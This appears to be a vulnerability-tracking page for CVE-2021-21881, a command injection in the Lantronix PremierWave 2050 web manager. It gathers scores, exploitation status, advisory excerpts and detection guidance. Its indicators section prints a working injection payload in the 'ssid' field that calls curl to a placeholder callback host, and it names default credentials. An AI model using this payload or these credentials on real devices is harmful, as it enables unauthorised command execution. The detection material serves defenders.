CVE-2021-21881
published 2021-12-22CVE-2021-21881: An OS command injection vulnerability exists in the Web Manager Wireless Network Scanner functionality of Lantronix PremierWave 2050 8.9.0.0R4. A…
PriorityP186critical9.9CVSS 3.1
AVNACLPRLUINSCCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
37.06%
98.3th percentile
An OS command injection vulnerability exists in the Web Manager Wireless Network Scanner functionality of Lantronix PremierWave 2050 8.9.0.0R4. A specially-crafted HTTP request can lead to command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| lantronix | premierwave_2050_firmware | — | — |
Detection & IOCsextracted from sources · hover to see the quote
urlPOST / HTTP/1.1 with ajax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid="'; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}' #↗
- →Detect exploitation attempts by monitoring POST requests to the root path (/) containing the 'ajax=WLANScanSSID' parameter combined with shell metacharacters in the 'ssid' field (e.g., single quotes, semicolons, backticks). ↗
- →The exploit uses HTTP Basic Authentication with hardcoded credentials. Monitor for Base64 values 'dXNlcjp1c2Vy' (user:user) and 'YWRtaW46UEFTUw==' (admin:PASS) in Authorization headers targeting Lantronix PremierWave devices. ↗
- →The vulnerability is triggered via the Web Manager Wireless Network Scanner endpoint. Look for POST requests with Content-Type: application/x-www-form-urlencoded containing 'Scan=Scan' and a malformed 'ssid' parameter with OS command injection payloads. ↗
- →Out-of-band detection: successful exploitation causes the device to issue an outbound HTTP request (e.g., via curl) with a randomized User-Agent header. Monitor for unexpected outbound HTTP connections from Lantronix PremierWave 2050 devices. ↗
- →The nuclei template uses stop-at-first-match with two credential pairs, indicating attackers may try both 'user:user' and 'admin:PASS' sequentially. Alert on multiple rapid authenticated POST requests to the same Lantronix device root path. ↗
- ·Exploitation requires prior authentication. The template tests two hardcoded credential pairs (user:user and admin:PASS), but real-world attackers may use other valid credentials. Detection rules should not rely solely on these specific credential values. ↗
- ·The User-Agent value used in the injected curl command is randomized per scan (rand_base(6)), so it cannot be used as a static IOC for network detection without dynamic correlation. ↗
- ·The vulnerability is specific to Lantronix PremierWave 2050 firmware version 8.9.0.0R4. Detection rules should be scoped to this CPE to avoid false positives. ↗
CVSS provenance
nvdv3.19.9CRITICALCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
nvdv3.09.9CRITICALCVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
nvdv2.09.0CRITICALAV:N/AC:L/Au:S/C:C/I:C/A:C
vulncheck9.9CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-fm7j-3jwj-3cr6: An OS command injection vulnerability exists in the Web Manager Wireless Network Scanner functionality of Lantronix PremierWave 2050 8
ghsa_unreviewed·2021-12-23
CVE-2021-21881 [CRITICAL] CWE-78 GHSA-fm7j-3jwj-3cr6: An OS command injection vulnerability exists in the Web Manager Wireless Network Scanner functionality of Lantronix PremierWave 2050 8
An OS command injection vulnerability exists in the Web Manager Wireless Network Scanner functionality of Lantronix PremierWave 2050 8.9.0.0R4. A specially-crafted HTTP request can lead to command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.
VulnCheck
lantronix premierwave_2050_firmware Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
vulncheck·2021·CVSS 9.9
CVE-2021-21881 [CRITICAL] lantronix premierwave_2050_firmware Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
lantronix premierwave_2050_firmware Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
An OS command injection vulnerability exists in the Web Manager Wireless Network Scanner functionality of Lantronix PremierWave 2050 8.9.0.0R4. A specially-crafted HTTP request can lead to command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.
Affected: lantronix premierwave_2050_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://unit42.paloaltonetworks.com/recent-exploits-network-security-trends/; https://www.cloudsek.com/blog/androxgh0st-continues-exploitation-operators
No detection rules found.
Nuclei
Lantronix PremierWave 2050 8.9.0.0R4 - Remote Command Injection
nuclei·CVSS 9.9
CVE-2021-21881 [CRITICAL] Lantronix PremierWave 2050 8.9.0.0R4 - Remote Command Injection
Lantronix PremierWave 2050 8.9.0.0R4 - Remote Command Injection
Lantronix PremierWave 2050 8.9.0.0R4 contains an OS command injection vulnerability. A specially-crafted HTTP request can lead to command in the Web Manager Wireless Network Scanner. An attacker can make an authenticated HTTP request to trigger this vulnerability.
Template:
id: CVE-2021-21881
info:
name: Lantronix PremierWave 2050 8.9.0.0R4 - Remote Command Injection
author: gy741
severity: critical
description: Lantronix PremierWave 2050 8.9.0.0R4 contains an OS command injection vulnerability. A specially-crafted HTTP request can lead to command in the Web Manager Wireless Network Scanner. An attacker can make an authenticated HTTP request to trigger this vulnerability.
impact: |
Successful exploitation of this vulnerabi
Unit42
Network Security Trends: Recent Exploits Observed in the Wild Include Remote Code Execution, Cross-Site Scripting and More
blogs_unit42·2022-08-19·CVSS 8.8
CVE-2021-20166 [HIGH] Network Security Trends: Recent Exploits Observed in the Wild Include Remote Code Execution, Cross-Site Scripting and More
Threat Research Center
Trend Reports
Vulnerabilities
## Network Security Trends: Recent Exploits Observed in the Wild Include Remote Code Execution, Cross-Site Scripting and More
Yue Guan
Published: August 19, 2022
Trend Reports
Vulnerabilities
Attack analysis
CVE-2021-20166
CVE-2021-20167
CVE-2021-21881
CVE-2021-24762
CVE-2021-28169
CVE-2021-31589
CVE-2021-39226
CVE-2021-4045
CVE-2021-43711
CVE-2022-21371
CVE-2022-21662
CVE-2022-22536
CVE-2022-22947
CVE-2022-22954
CVE-2022-22963
CVE-2022-22965
CVE-2022-24112
CVE-2022-24260
CVE-2022-25060
CVE-2022-25075
CVE-2022-25134
CVE-2022-27226
CVE-2022-29464
Exploit in the wild
Network security trends
## Executive Summary
Recent observations of exploits used in the wild reveal that attackers have been making use
Unit42
Network Security Trends: Recent Exploits Observed in the Wild Include Remote Code Execution, Cross-Site Scripting and More
blogs_unit42·2022-08-19
Network Security Trends: Recent Exploits Observed in the Wild Include Remote Code Execution, Cross-Site Scripting and More
## Executive Summary
Recent observations of exploits used in the wild reveal that attackers have been making use of newly published remote code execution vulnerabilities in VMware ONE Access and Identity Manager and Spring Cloud Function, Spring MVC and Spring Web Flux, among others. Attackers have also been taking advantage of a cross-site scripting vulnerability in WordPress core, and SQL injection vulnerabilities in VoIPmonitor GUI and other services. In our observations of network security trends, Unit 42 researchers select exploits of the latest published attacks that defenders should know based on the availability of proofs of concept (PoCs), the severity of the vulnerabilities the exploits are based on and the ease of exploitation.
Other insights that could assist defenders includ
Talos
Vulnerability Spotlight: Vulnerabilities in Lantronix PremierWave 2050 could lead to code execution, file deletion
blogs_talos·2021-11-15·CVSS 9.9
[CRITICAL] Vulnerability Spotlight: Vulnerabilities in Lantronix PremierWave 2050 could lead to code execution, file deletion
## Vulnerability Spotlight: Vulnerabilities in Lantronix PremierWave 2050 could lead to code execution, file deletion
Matt Wiseman discovered these vulnerabilities.
Cisco Talos recently discovered multiple vulnerabilities in Lantronix’s PremierWave 2050, an embedded Wi-Fi module.
There are several vulnerabilities in PremierWave 2050’s Web Manager, a web-accessible application that allows users to configure settings for the 2050 gateway. An attacker could exploit some of these vulnerabilities to carry out a range of malicious actions, including executing arbitrary code and deleting or replacing files on the targeted device. Twelve of these vulnerabilities could allow a malicious user to manipulate the Web Manager in a way — for example, overflowing a fixed-size buffer — that would allow
Talos
Vulnerability Spotlight: Vulnerabilities in Lantronix PremierWave 2050 could lead to code execution, file deletion
blogs_talos·2021-11-15·CVSS 9.9
[CRITICAL] Vulnerability Spotlight: Vulnerabilities in Lantronix PremierWave 2050 could lead to code execution, file deletion
Matt Wiseman discovered these vulnerabilities.
Cisco Talos recently discovered multiple vulnerabilities in Lantronix’s PremierWave 2050, an embedded Wi-Fi module.
There are several vulnerabilities in PremierWave 2050’s Web Manager, a web-accessible application that allows users to configure settings for the 2050 gateway. An attacker could exploit some of these vulnerabilities to carry out a range of malicious actions, including executing arbitrary code and deleting or replacing files on the targeted device. Twelve of these vulnerabilities could allow a malicious user to manipulate the Web Manager in a way — for example, overflowing a fixed-size buffer — that would allow them to execute arbitrary code. These vulnerabilities all require the attacker to authenticate to the Web Manager first
Greynoiseio
NoiseLetter January 2025
blogs_greynoiseio
NoiseLetter January 2025
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
2021-12-22
Published
Exploited in the wild